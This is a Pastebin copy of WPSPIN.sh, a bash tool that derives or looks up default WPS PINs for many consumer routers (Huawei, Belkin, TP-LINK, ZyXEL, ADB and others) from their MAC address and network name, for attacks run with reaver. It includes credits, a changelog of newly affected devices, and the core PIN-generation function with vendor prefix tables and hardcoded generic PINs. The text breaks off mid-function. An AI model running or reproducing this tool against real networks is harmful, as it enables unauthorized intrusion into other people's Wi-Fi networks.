Guest User

WPSPIN.sh

a guest
Aug 9th, 2014
4,032
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. #################################################### LEGAL ADVISORY ####################################################################3
  4.  
  5. # This scripts is edited under the General Public License version 3 as defined by the Free software foundation.
  6. # This package is distributed in the hope that it will be useful, but without any warranty; It can be used and modified and shared but should be referenced to, it CANNOT be
  7. # sold or be used for a commercial-economical purpose.
  8. # See the details in the file LICENSE.txt that is situated in the folder of the script or visit http://gplv3.fsf.org/ )
  9.  
  10.  
  11.  
  12. ##################################################### ABOUT WPSPIN + CREDITS #################################################################3
  13.  
  14.  
  15.  
  16. #The first version was released in crack-wifi.com, lampiweb.com and auditoriaswireless.net the 8th December 2012
  17. #It was published to reveal the results of my studies about Huawei HG 532s from ISP FTE (orange - Spanish branch)
  18. #I found the way to derivate the default WPSPIN from bssid and essid
  19. #Surprisingly a variant of the same algorithm ( but just based ) on the mac address worked on belkin device and another huawei router
  20. #I thought I found another algorithm, but i realized that it had been parallely and previously by zhaochunsheng in a C. script named computepinC83A35
  21. #( http://gjkiss.info/2012/04/get-the-pin-in-router-mac-address-start-with-c83a35-00b00c-081075 )
  22. #Later i integrated arcadyan easybox PIN generation has revealed by Stefan Viehböck ( https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt )
  23. #and the WPA key generation for the same device thanks to a full disclosure of Stefan wottan ( http://www.wotan.cc/?p=6 )
  24. #finally i used VodafoneXXXX Arcadyan Essid  by coeman76 that unifies both and correct errors from original codes
  25.  
  26. #Everything was adapted to bash from the scratch thanks to the collaboration of antares_145, r00tnuLL and 1camaron1, thanks to them billion a billion time :)
  27.  
  28. #It would't have been possible neither without my beloved lampiweb.com work crew, maripuri, bentosouto, dirneet, betis-jesus, compota, errboricobueno, pinty_102 and all users
  29. #greetings to crack-wifi.com family, yasmine, M1ck3y, spawn, goliate, fuji, antares has been already credited, koala, noireaude, vances1, konik etc... and all users
  30. #greetings to auditoriaswireless.net and thanks to the big chief papones for the hosting and greetings to everybody
  31. #This code uses wps reaver that has to be installed on it own, reaver is a free software (http://code.google.com/p/reaver-wps/) (GPL2) by Tactical Network Solutions. Thanks to
  32. #them for this amazing work (especially Craig Heffner )
  33. #You also need aircrack-ng, thanks to Mister X and kevin devine for providing the best suite ever (http://www.aircrack-ng.org/)
  34. #Developed for debian based system such as Ubuntu, xubuntu, linux mint... and especially kali linux, thanks to offensive security for theirs work and special greetings to g0tmi1k
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42. #####################################################     CHANGELOG      ########################################################################3
  43.  
  44.  
  45.  
  46. # 1.1 (10-12-2012)
  47. #   - Support for PIN beginning with one or several 0 thanks to the data of atim and tresal.
  48. #   - New MAC supported : 6A:C0:6F (HG566 default ESSID vodafoneXXXX )
  49. # 1.2 (12/12/2012)
  50. #   - Fixed output bugs in backtrack and other distributions
  51. #   - Added support to the generic default PIN known
  52. # 1.3 (23/01/2013)
  53. #   - New supported devices:
  54. #       - 7 bSSID vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
  55. #       - 2 bSSID WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
  56. #       - 2 new models affected:
  57. #           1) SWL (Samsung Wireless Link), default ESSID SEC_ LinkShare_XXXXXX.  2 known affected BSSID > 80:1F:02 / E4:7C:F9
  58. #           2) Conceptronic  c300brs4a  (default ESSID C300BRS4A ) 1 BSSID known  > 00:22:F7  
  59. #   - Rules to check the validity of the mac address (thanks r00tnuLL and anteres_145 for your codes)
  60. #   - More filter for some case where several default ssid are possible,check the difference between ssid and bssid for FTE for possibles mismatch...
  61. #       - More information displayed when a target is selected
  62. #   - Display and colours problems are definitively solved for all distributions, one version
  63. #   - Rewriting of code (tanks to r00tnuLL, antares_145, goyfilms and 1camron1 for their advices and feed back)
  64. # 1.4 ( 22/05/2013)
  65. #      - Complete Rewriting of code to provide new functions:
  66. #          - Multi language        
  67. #          - A automated mode using wash and reaver
  68. #          - Interfaces management (automatic if only one interface is present, acting as filter if no mode monitor is possible to reduce options)
  69. #          - New supported bssid
  70. #              -  2 news bssid for FTE-XXXX (HG532c)   34:6B:D3 and F8:3D:FF
  71. #              -  17 new bssid for vodafone HG566a
  72. #               62:23:3D 62:3C:E4 62:3D:FF 62:55:9C 62:7D:5E 62:B6:86 62:C7:14 6A:23:3D 6A:3D:FF 6A:7D:5E 6A:C6:1F 6A:D1:5E 72:3D:FF 72:53:D4 72:55:9C 72:6B:D3  72:A8:E4  
  73. #          - New supported devices ( 9 models )    
  74. #              -  TP-LINK  >  TD-W8961ND v2.1 default SSID TP-LINK_XXXXXX  3 known bssids ; F8:D1:11 B0:48:7A 64:70:02
  75. #              -  EDIMAX  >  3G-6200n and EDIMAX  >  3G-6210n    bssid ; 00:1F:1F defaukt SSID : default
  76. #              -  KOZUMI >  K1500 and   K1550  bssid : 00:26:CE
  77. #              -  Zyxel  >  P-870HNU-51B      bssid : FC:F5:28
  78. #              -  TP-LINK  TP-LINK_XXXXXX  TL-WA7510N    bssid : 90:F6:52:
  79. #              -  SAGEM FAST 1704 > SAGEM_XXXX    bssid :  7C:D3:4C:
  80. #              -  Bewan iBox V1.0 > one bssid   00:0C:C3  for two ssids with different defaukt PIN   >   DartyBox_XXX_X and TELE2BOX_XXXX
  81. # 1.5 ( 24/01/2014 )
  82. #
  83. #        - Imlemented bash adaptation of esay box arcadyan vodane PIN and WPA algorithm by coeman76
  84. #        - Grafic changes and code optimization
  85. #        - New filters for preventing permissions issues, directory issues, unisntalled tools isuues, interfaces issues
  86. #        - Fixed the bug for FTE red  
  87. #        - New option to define a sequence of PIN to try first ( thanks to Spawn for recursive_generator )
  88. #        - New option to enter manually a different PIN then than one proposed
  89. #        - -p option with reaver is not used any longuer due to lost of quality of attack and PIN are genrated live
  90. #        - detection of processing error to backup the sesssion untill the PIN that could create a problem in order to avoid the "99,99% bug"
  91. #        - function to adapt mode monitor managment with RT 3XXX chipsets
  92. #        - Default WPA key is shown once target has been selected if the algorithm for default wpa is known ( still a lot to implement )
  93. #        - prevent reaver failure when saving a sesssion
  94. #        - bash adaptation of arcadyan easy box WPA and PIN generator by coeman76
  95. #        - display the progress of a former sesssion before attacking the target again
  96. #        - option to allow the user to customize the reaver command line
  97. #        - New supported bssid
  98. #             - modification for 08863B with new devices, repeater N300 Dual-Band Wi-Fi Range Extender no compatible, with AP rate limit
  99. #             - new bssid  F81A67 for TD-W8961ND with AP RATE LIMIT
  100. #             - new vodafone-XXXX BSSID = 6296BF 6ACBA8 62:CB:A8 72:CB:A8....
  101. #             - new bssid for PDG4100ND D0:D4:12 with refereed PIN 88202907  
  102. #          - New supported devices
  103. #             - NEW DEVICES, D-LINK, DSL-2730U (bssid = B8A386 | B8A386) & DSL-2750U C8:D3:A3 , with respectively generic PIN 20172527 &  #21464065
  104. #             - NEW DEVICE, ZTE ; ZXHN_H108N , default generic 12345670 bssids: F8:1B:FA & F8:ED:80 default ssid = MOVISTAR_XXXX
  105. #             - 08:7A:4C E8:CD:2D 0C:96:BF NEW DEVICE   Orange-XXXX / HG530s ( Huawei )  
  106. #             - E4:C1:46 for MOVISTAR_XXXX. Model : Observa Telecom - RTA01N_Fase2 comercialized by Objetivos y Servicios de Valor  
  107. #             - new TP-LINK device affected TD-W8951ND with AP RATE LIMIT and known bssid A0:F3:C1:
  108. #             - the last Bbox, with default ssid Bbox-XXXXXXXX, manufactures by SAMSUNG is vulnerable , known BSSID = 5C:A3:9D DC:71:44 D8:6C:E9
  109. #             - VodafoneXXXX New device for mac 1C:C6:3C 50:7E:5D 74:31:70 84:9C:A6 88:03:55 full disclosure aracadyan PIN-WPA model : ARV7510PW22
  110. #             - HG 532e from djibouti, default ssid HG532e-XXXXXX , mac  EC:23:3D
  111. #             - DG950A from Arris Interactive  L.L.C, mac 00:1D:CF, default SSID ARRIS-XXXX
  112. #             - CDE-30364 from Hiltron - used by spanish ISP OnO with default ssid OnOXXX0 - mac : BC1401 68B6CF 00265B
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119. #####################################  STARTING WPSPIN        #############################################################33
  120. #########################################################################################################################33
  121.  
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128. ##################################### GLOBAL VARIABLES
  129.  
  130. printf '\033[8;37;80t'                # we define a format for the shell, very close to the default one in many distributions
  131.  
  132. colorbase="\033[0;37m"                  
  133. #colorbase="\E[0m"                      # We define the colors as variables to avoid problems of output from one distribution to the other
  134. REALORANGE="\033[1;43m"
  135. negro="\033[0;30m"
  136. verde="\033[0;32m"
  137. orange="\033[0;33m"
  138. azul="\033[0;34m"
  139. kindofviolet="\033[0;35m"
  140. gris="\033[1;30m"
  141. rojo="\033[1;31m"
  142. verdefluo="\033[1;32m"
  143. amarillo="\033[1;33m"
  144. azullight="\033[1;34m"
  145. magenta="\033[1;35m"
  146. azulfluo="\033[1;36m"
  147. blanco="\033[1;37m"
  148. rougesombre="\033[2;31m"
  149. vertmoyen="\033[2;32m"
  150. caki="\033[2;33m"
  151. bleuconde="\033[2;34m"
  152. violet="\033[2;35m"
  153.  
  154.  
  155. ###############################          FUNCTIONS          ###########################################################################################
  156.  
  157. ###############################  FIRST THE ONE THAT ARE COMMON TO EVERY LANGUAGE (NO DISPLAY INVOLVED) ##################################################
  158.  
  159. ##############################  I    > GENERATE - TO ATTRIBUTE PIN AND DATA TO AP
  160. ############################### II   > CHECKSUM (by antares_145 ) - CALCULATE THE WPS CHECKSUM
  161. ############################### III  > ZAOMODE - APPLYING THE SAME ALGORITHM THAN ZHAOCHUNSHENG IN COMPUTEPIN
  162. ############################### IV   > IFACE - MANAGE INTERFACES FOR WIRELESS INTRUSION AND LIMIT USER TO SHORT MENU IF NO INTERFACE IS AVAILABLE
  163. ############################### V    > IFACE_SELECTION - FOR SELECTING THE INTERFACE IF SEVERAL ARE AVAILABLE
  164. ############################### VI   > WASH_SCAN - LAUNCH WPS SCANNING REORGANIZING THE OUTPUT DISPLAY (use wash form reaver)
  165. ############################### VII  > REAVER_CHECK - CONTROL IF REAVER IS INSTALLED (ALSO CHECK IF WASH OR WALSH IS USED)
  166. ############################### VIII > BIG_MENUE - WPSPIN WITH ALL FEATURES  
  167. ############################### IX   > CLEAN - REMOVE TMP FILES AND UNSET THE VARIABLES
  168. ###############################  X   > recursive_generator( by spawn from crack-wifi.com, thank you ;) ) - STRING GENERATOR
  169. ############################### XI   > BASICPINGENERATOR - GENERATE A BASIC PIN DICTIONARY
  170. ############################### XII  > WPCGENERATOR - GENERATE A WPC FILE  
  171. ############################### XIII > PRIMARY_CHECK - CHECK ROOT PRIVILEGE AND LOCATION
  172. ############################### XIV  > REGENERATE - TO RE-GENERATE A WPC FILE
  173. ############################### XV   > ATTACK_ATTACK - ACTIVATE REAVER AND MANAGE ATTACK LOG
  174. ############################### XVI  > ARACDYAN - GENERATE PIN AND DEFAULT PASSWORD FOR RACADYAN DEVICE(*)
  175. #(*) # This function uses three amazing works
  176. #   1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
  177. #   2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
  178. #   3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team
  179. # Thank you guys!
  180.  
  181. ###################   GENERATE ######################################################################################################################################
  182. ################################################## the core of script, attribute a default PIN to the routers
  183.  
  184. ###### VARIABLES CODIFIED          ACTIVATED >  1 = YES  0 = NO       APRATE > 1 = YES  0 = NO    SPECIAL > 1 = SEVERAL MODEL WITH THIS BSSID       ############################
  185. ###############################    UNKNOWN   >  0 = SUPPORTED      1 = YES     2 = NOT SUPPORTED
  186.  
  187.  
  188.  
  189.  
  190. GENERATE(){                                                                  # this functions will attribute a default PIN number according to the bssid and in some cases bssid
  191.                                                                              # and essid, we need at least to have defined a variable BSSID (the mac address of the objective
  192.  
  193. DEFAULTWPA=""
  194. APRATE=0
  195. UNKNOWN=0                                                                    # By default routers are  marked as supported with 0, when there are not this value will be changed
  196. SPECIAL=0
  197. FABRICANTE=""
  198. MODEL=""
  199. DEFAULTSSID=""
  200. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')                   # we take pout the 6 first half of the mac address (to identify the devices=  
  201. FINBSSID=$(echo $BSSID | cut -d ':' -f4,5,6)                                 # we keep the other half to generate the PIN
  202. MAC=$(echo $FINBSSID | tr -d ':')                                            # taking away the ":"
  203. CONVERTEDMAC=$(printf '%d\n' 0x$MAC) 2> /dev/null                                        # conversion to decimal
  204.  
  205.  
  206.  
  207.  
  208.  
  209.  
  210.  
  211. ########################################   SUPPORTED DEVICES ###############################################################################################3
  212.  
  213.  
  214.  
  215. case $CHECKBSSID in                                                          # we will check the beginning of the mac to identify the AP
  216.  
  217.  
  218. 04C06F | 202BC1 | 285FDB | 346BD3 | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0 | F83DFF)    # For FTE-XXXX (HG552c), original algorithm by kcdtv  
  219. FINESSID=$(echo $ESSID | cut -d '-' -f2)                                     # We take the identifier of the essid with cut
  220. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')                       # we take digit 7 and 8 of the mac address
  221. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')                     # we isolate the digits 9 to 12 to check the conformity of the default difference BSSID - ESSID
  222. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];  
  223.        
  224. then
  225. MACESSID=$(echo $PAREMAC$FINESSID)                                           # this is the string used 7 and 8 digits mac + 4 last digits essid FTE-XXXX
  226. PRESTRING=`expr $(printf '%d\n' 0x$MACESSID) '+' 7`                             # we had 7 to the string
  227.  
  228. STRING=`expr '(' $PRESTRING '%' 10000000 ')' `
  229.  
  230. CHECKSUM
  231.  
  232.   else                                                                       # if essid is not the default one we will generate the three possible PIN according to the mac
  233.   STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')' '+' 8`                     # mac + 8 converted to decimal = our PIN2
  234.  
  235.   CHECKSUM
  236.  
  237.   PIN2=$PIN
  238.   STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')' '+' 14`                    # mac + 14 converted to decimal = our PIN3
  239.  
  240.   CHECKSUM
  241.  
  242.   PIN3=$PIN                                          
  243.  
  244.   ZAOMODE                                                                    # PIN number one we use the first algorithm, end mac converted to decimal
  245.  
  246.   CHECKSUM
  247.  
  248. fi
  249.  
  250. FABRICANTE="HUAWEI"                             ##### FTE-XXXX HUAWEI HG532c Echo Life  > algorithm kcdtv
  251. DEFAULTSSID="FTE-XXXX"
  252. MODEL="HG532c Echo Life"
  253. ACTIVATED=1
  254.  
  255.  
  256. ;;
  257. C8D15E )
  258.  
  259. FABRICANTE="HUAWEI"                             ##### Jazztel_XX HUAWEI HG532c Echo Life  > algorithm kcdtv
  260. DEFAULTSSID="Jazztel_XX "
  261. MODEL="HG532c Echo Life"
  262. ACTIVATED=1
  263.  
  264.  
  265.  
  266. ;;
  267. 001915 )                                        ##### WLAN-XXXX TECOM  AW4062   > generic 12345670
  268.  
  269. PIN=12345670
  270.  
  271. FABRICANTE="TECOM Co., Ltd."
  272. DEFAULTSSID="WLAN_XXXX"
  273. MODEL="AW4062"
  274. ACTIVATED=0                                    # 0 is given to the routers that does not't have WPS enabled
  275.  
  276.  
  277. ;;
  278. F43E61 | 001FA4)                               ####### WLAN_XXXX  OEM Shenzhen Gongjin Electronics   Encore ENDSL-4R5G   > Generic 12345670
  279.  
  280. PIN=12345670
  281.  
  282. FABRICANTE="Shenzhen Gongjin Electronics Co., Ltd"
  283. DEFAULTSSID="WLAN_XXXX"
  284. MODEL="Encore ENDSL-4R5G"
  285. ACTIVATED=1                                    # 1 and the wps is activated
  286.  
  287.  
  288.  
  289. ;;
  290. 404A03)                                      ######## WLAN_XXXX P-870HW-51A V2  ZYXELL    > Generic 11866428
  291.  
  292. PIN=11866428
  293.  
  294. FABRICANTE="ZyXEL Communications Corporation"
  295. DEFAULTSSID="WLAN_XXXX"
  296. MODEL="P-870HW-51A V2"
  297. ACTIVATED=1
  298.  
  299. ;;
  300. 001A2B)                                     ######## WLAN_XXXX Gigabyte 802.11n by Comtrend      >Generic 88478760
  301.  
  302. PIN=88478760                                # comtrend has others models with this mac for the moment we will give this PIN for all devices warning the user
  303. PIN2=77775078
  304. FABRICANTE="Ayecom Technology Co., Ltd."
  305. DEFAULTSSID="WLAN_XXXX"
  306. MODEL="Comtrend Gigabit 802.11n"
  307. ACTIVATED=1
  308. SPECIAL=1                                           # 2 when different models with different PIN have the same start of bssid
  309.  
  310. ;;
  311. 3872C0)                                   # ######## JAZZTEL_XXXX AR-5387un  Comtrend   > Generic 18836486 20172527
  312.  
  313. PIN=18836486                              # same story, some of this range mac address are used by Telefonica (WLAN_XXXX) in this case there is not even wps, we let it this way
  314. PIN2=20172527
  315.  
  316. FABRICANTE="Ayecom Technology Co., Ltd."
  317. DEFAULTSSID="JAZZTEL_XXXX"
  318. MODEL="Comtrend AR-5387un"
  319. ACTIVATED=0
  320.            
  321.  
  322. ;;
  323. FCF528)                                   ######### WLAN_XXXX P-870HNU-51B by ZYXELL  > Generic 20329761
  324.  
  325. PIN=20329761                          
  326.  
  327. FABRICANTE="ZyXEL Communications Corporation"
  328. DEFAULTSSID="WLAN_XXXX"
  329. MODEL="P-870HNU-51B"
  330. ACTIVATED=1
  331. APRATE=1
  332.  
  333. ;;
  334. 3039F2)                          ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
  335. PIN=16538061
  336. PIN2=16702738
  337. PIN3=18355604
  338. PIN4=88202907
  339. PIN5=73767053
  340. PIN6=43297917
  341. PIN7=19756967
  342. PIN8=13409708
  343. FABRICANTE="ADB-Broadband"
  344. DEFAULTSSID="WLAN_XXXX"
  345. MODEL="PDG-A4001N"
  346. ACTIVATED=1
  347.  
  348.  
  349. ;;
  350. 74888B)                   ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
  351. PIN=43297917
  352. PIN2=73767053
  353. PIN3=88202907
  354. PIN4=16538061
  355. PIN5=16702738
  356. PIN6=18355604
  357. PIN7=19756967
  358. PIN8=13409708
  359. FABRICANTE="ADB-Broadband"
  360. DEFAULTSSID="WLAN_XXXX"
  361. MODEL="PDG-A4001N"
  362. ACTIVATED=1
  363.  
  364.  
  365. ;;
  366. A4526F)                  ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
  367. PIN=16538061
  368. PIN2=88202907
  369. PIN3=73767053
  370. PIN4=16702738
  371. PIN5=43297917
  372. PIN6=18355604
  373. PIN7=19756967
  374. PIN8=13409708
  375. FABRICANTE="ADB-Broadband"
  376. DEFAULTSSID="WLAN_XXXX"
  377. MODEL="PDG-A4001N"
  378. ACTIVATED=1
  379.  
  380. ;;
  381. DC0B1A)                   ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
  382. PIN=16538061
  383. PIN2=16702738
  384. PIN3=18355604
  385. PIN4=88202907
  386. PIN5=73767053
  387. PIN6=43297917
  388. PIN7=19756967
  389. PIN8=13409708
  390. FABRICANTE="ADB-Broadband"
  391. DEFAULTSSID="WLAN_XXXX"
  392. MODEL="PDG-A4001N"
  393. ACTIVATED=1
  394.  
  395.  
  396. ;;
  397. D0D412)                  ############# PIN WLAN_XXXX PDG-A4001N by ADB-Broadband > multiples generic PIN
  398. PIN4=16538061
  399. PIN2=16702738
  400. PIN3=18355604
  401. PIN=88202907
  402. PIN5=73767053
  403. PIN6=43297917
  404. PIN7=19756967
  405. PIN8=13409708
  406. FABRICANTE="ADB-Broadband"
  407. DEFAULTSSID="WLAN_XXXX"
  408. MODEL="PDG-A4001N"
  409. ACTIVATED=1
  410.  
  411.  
  412. ;;
  413. 5C4CA9 | 62233D | 623CE4 | 623DFF | 62559C | 627D5E | 6296BF | 62A8E4 | 62B686 | 62C06F | 62C61F | 62C714 | 62CBA8 | 62E87B | 6A1D67 | 6A233D | 6A3DFF | 6A53D4 | 6A559C | 6A6BD3 | 6A7D5E | 6AA8E4 | 6AC06F | 6AC61F | 6AC714 | 6ACBA8 | 6AD15E | 6AD167 | 723DFF | 7253D4 | 72559C | 726BD3 | 727D5E | 7296BF | 72A8E4 | 72C06F | 72C714 | 72CBA8 | 72D15E | 72E87B )  
  414.  
  415. ZAOMODE                                                                                        
  416. CHECKSUM
  417.  
  418. FABRICANTE="HUAWEI"         ############# HUAWEI HG 566a vodafoneXXXX > Pin algo zao
  419. DEFAULTSSID="vodafoneXXXX"
  420. MODEL="HG 566a"
  421. ACTIVATED=1
  422.  
  423. ;;
  424. 002275)
  425.  
  426. ZAOMODE                                                                                        
  427. CHECKSUM
  428.  
  429. FABRICANTE="Belkin"         ############# Belkin Belkin_N+_XXXXXX  F5D8235-4 v 1000  > Pin algo zao
  430. DEFAULTSSID="Belkin_N+_XXXXXX"
  431. MODEL="F5D8235-4 v 1000"
  432. ACTIVATED=1
  433.  
  434. ;;
  435. 08863B)
  436.  
  437. if [[ -n `(echo "$ESSID" | grep -E '_xt' )` ]];
  438.  
  439.   then
  440. UNKNOWN=2
  441. FABRICANTE="Belkin"
  442. DEFAULTSSID="XX...-xt"
  443. MODEL="N300 Dual-Band Wi-Fi Range Extender"
  444. ACTIVATED=1
  445. APRATE=1
  446.  else
  447.  
  448. ZAOMODE                                                                                        
  449. CHECKSUM
  450.  
  451. FABRICANTE="Belkin"         ############# Belkin belkin. F5D8235-4 v 1000  > Pin algo zao # update: several models share this bssid
  452. DEFAULTSSID="belkin.XXX"
  453. MODEL="F9K1104(N900 DB Wireless N+ Router)"
  454. ACTIVATED=1
  455. SPECIAL=1
  456.  
  457. fi
  458.  
  459. ;;
  460. 001CDF)
  461.  
  462. ZAOMODE                                                                                        
  463. CHECKSUM
  464.  
  465. FABRICANTE="Belkin"         ############# Belkin belkin. F5D8235-4 v 1000  > Pin algo zao
  466. DEFAULTSSID="belkin.XXX"
  467. MODEL="F5D8235-4 v 1000"
  468. ACTIVATED=1
  469.  
  470. ;;
  471. 00A026)
  472.  
  473. ZAOMODE                                                                                        
  474. CHECKSUM
  475.  
  476. FABRICANTE="Teldat"         ############# Teldat WLAN_XXXX iRouter1104-W  > Pin algo zao
  477. DEFAULTSSID="WLAN_XXXX"
  478. MODEL="iRouter1104-W"
  479. ACTIVATED=1
  480.  
  481.  
  482. ;;
  483. 5057F0)
  484.  
  485. ZAOMODE                                                                                        
  486. CHECKSUM
  487.  
  488. FABRICANTE="ZyXEL Communications Corporation"         ############# Zyxel ZyXEL zyxel NBG-419n  > Pin algo zao
  489. DEFAULTSSID="ZyXEL"
  490. MODEL="zyxel NBG-419n"
  491. ACTIVATED=1
  492.  
  493.  
  494. ;;
  495. C83A35 | 00B00C | 081075)
  496.  
  497. ZAOMODE                                                                                        
  498. CHECKSUM
  499.  
  500. FABRICANTE="Tenda"         ############# Tenda W309R  > Pin algo zao, original router that was used by ZaoChusheng to reveal the security breach
  501. DEFAULTSSID="cf. computepinC83A35"
  502. MODEL="W309R"
  503. ACTIVATED=1
  504.  
  505. ;;
  506. E47CF9 | 801F02)
  507.  
  508. ZAOMODE                                                                                        
  509. CHECKSUM
  510.  
  511. FABRICANTE="SAMSUNG"         ############# SAMSUNG   SEC_ LinkShare_XXXXXX  SWL (Samsung Wireless Link)  > Pin algo zao
  512. DEFAULTSSID="SEC_ LinkShare_XXXXXX"
  513. MODEL="SWL (Samsung Wireless Link)"
  514. ACTIVATED=1
  515.  
  516. ;;
  517. 0022F7)
  518.  
  519. ZAOMODE                                                                                        
  520. CHECKSUM
  521.  
  522. FABRICANTE="Conceptronic"         ############# CONCEPTRONIC   C300BRS4A  c300brs4a  > Pin algo zao
  523. DEFAULTSSID="C300BRS4A"
  524. MODEL="c300brs4a"
  525. ACTIVATED=1
  526.  
  527.        
  528. ;;                                 ########### NEW DEVICES SUPPORTED FOR VERSION 1.5 XD
  529. F81A67 | F8D111 | B0487A | 647002 )              
  530.  
  531. ZAOMODE                                                                                        
  532. CHECKSUM
  533.  
  534. FABRICANTE="TP-LINK"             ######## TP-LINK_XXXXXX  TP-LINK  TD-W8961ND v2.1   > Pin algo zao
  535. DEFAULTSSID="TP-LINK_XXXXXX"
  536. MODEL="TD-W8961ND v2.1"
  537. ACTIVATED=1
  538. APRATE=1
  539.  
  540.  
  541. ;;
  542. 001F1F)
  543.  
  544. ZAOMODE                                                                                        
  545. CHECKSUM
  546.  
  547. FABRICANTE="EDIMAX"              ########## EDIMAX 3G-6200n "Default"   > PIN ZAO
  548. DEFAULTSSID="Default"
  549. MODEL="3G-6200n"
  550. ACTIVATED=1
  551.  
  552.  
  553. ;;
  554. 001F1F)
  555.  
  556. ZAOMODE                                                                                        
  557. CHECKSUM
  558.  
  559. FABRICANTE="EDIMAX"              ########## EDIMAX 3G-6200n/3G-6210n "Default"   > PIN ZAO
  560. DEFAULTSSID="Default"
  561. MODEL="3G-6200n & 3G-6210n"
  562. ACTIVATED=1
  563.  
  564. ;;
  565. 0026CE)
  566.  
  567. ZAOMODE                                                                                        
  568. CHECKSUM
  569.  
  570. FABRICANTE="KUZOMI"              ########## KUZOMI K1500 & K1550 "Default"   > PIN ZAO
  571. DEFAULTSSID="Default"
  572. MODEL="K1500 & K1550"
  573. ACTIVATED=1
  574.  
  575.  
  576. ;;
  577. 90F652)
  578.  
  579. PIN=12345670
  580.  
  581. FABRICANTE="TP-LINK"            ########## TP-LINK  TP-LINK_XXXXXX  TL-WA7510N  > PIN   generic 12345670
  582. DEFAULTSSID="TP-LINK_XXXXXX"
  583. MODEL="TL-WA7510N"
  584. ACTIVATED=1
  585.  
  586.  
  587. ;;
  588. 7CD34C)                        ########### SAGEM FAST 1704    > PIN GENERIC 43944552
  589.  
  590. PIN=43944552
  591.  
  592. FABRICANTE="SAGEM"
  593. DEFAULTSSID="SAGEM_XXXX"
  594. MODEL="fast 1704"
  595. ACTIVATED=1
  596.  
  597.  
  598. ;;
  599. 000CC3)                               ########### BEWAN, two default ssid abd two default PIN ELE2BOX_XXXX > 47392717   Darty box ; 12345670
  600.  
  601. if [[ $ESSID =~ ^TELE2BOX_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then
  602.  
  603. FABRICANTE="BEWAN"
  604. DEFAULTSSID="TELE2BOX_XXXX"
  605. MODEL="Bewan iBox V1.0"
  606. ACTIVATED=1
  607. APRATE=1
  608. PIN=47392717
  609.  
  610.  
  611. elif  [[ $ESSID =~ ^DartyBox_[[:xdigit:]]{3}_[[:xdigit:]]{1}*$ ]]; then
  612.  
  613.  
  614. FABRICANTE="BEWAN"
  615. DEFAULTSSID="DartyBox_XXX_X"
  616. MODEL="Bewan iBox V1.0"
  617. ACTIVATED=1
  618. PIN=12345670
  619.  
  620. else
  621.  
  622. FABRICANTE="BEWAN"
  623. DEFAULTSSID="TELE2BOX_XXXX / DartyBox_XXX_X"
  624. MODEL="Bewan iBox V1.0"
  625. ACTIVATED=1
  626. APRATE=1
  627. PIN=47392717
  628. PIN2=12345670
  629.  
  630. fi
  631.  
  632.  
  633. ;;
  634. A0F3C1)
  635.  
  636. ZAOMODE                                                                                        
  637. CHECKSUM
  638.  
  639. FABRICANTE="TP-LINK"             ######## TP-LINK_XXXXXX  TP-LINK TD-W8951ND   > Pin algo zao
  640. DEFAULTSSID=$(echo "TP-LINK_XXXX(XX)")
  641. MODEL="TD-W8951ND"
  642. ACTIVATED=1
  643. SPECIAL=1
  644.  
  645.  
  646.  
  647. ;;
  648. 5CA39D | DC7144 | D86CE9)              # Bbox with Essid Bbox-XXXXXXXX, algo zao, no limits by samsung
  649.  
  650. ZAOMODE                                                                                        
  651. CHECKSUM
  652.  
  653.  
  654. FABRICANTE="Samsung"
  655. ACTIVATED=1
  656. DEFAULTSSID="Bbox-XXXXXXXX"
  657. MODEL="Bbox by Samsung"
  658. ACTIVATED=1
  659.  
  660.  
  661.  
  662. ;;
  663. B8A386)          # D-Link DSL-2730U con PIN generico 20172527
  664.  
  665. DEFAULTSSID="Dlink_XXXX"
  666. FABRICANTE="D-Link"
  667. MODEL="D-Link DSL-2730U"
  668. ACTIVATED=1
  669. PIN=20172527
  670.  
  671.  
  672. ;;
  673. C8D3A3)                  # D-Link DSL-2750U con PIN generico 21464065  
  674.  
  675. DEFAULTSSID="Dlink_XXXX"
  676. FABRICANTE="D-Link"
  677. MODEL="D-Link DSL-2750U"
  678. ACTIVATED=1
  679. PIN=21464065
  680.  
  681.  
  682. ;;
  683. F81BFA | F8ED80)        # ZTE -  ZXHN_H108N  pin generico 12345670
  684.  
  685. DEFAULTSSID="MOVISTAR_XXXX"
  686. FABRICANTE="ZTE"
  687. MODEL="ZXHN_H108N"
  688. ACTIVATED=1
  689. PIN=12345670
  690.  
  691.  
  692. ;;
  693. E4C146)               # Observa Telecom - Router ADSL (RTA01N_Fase2)
  694.  
  695. if [ -n "`(echo $ESSID | grep -F MOVISTAR)`" ] ; then
  696.  
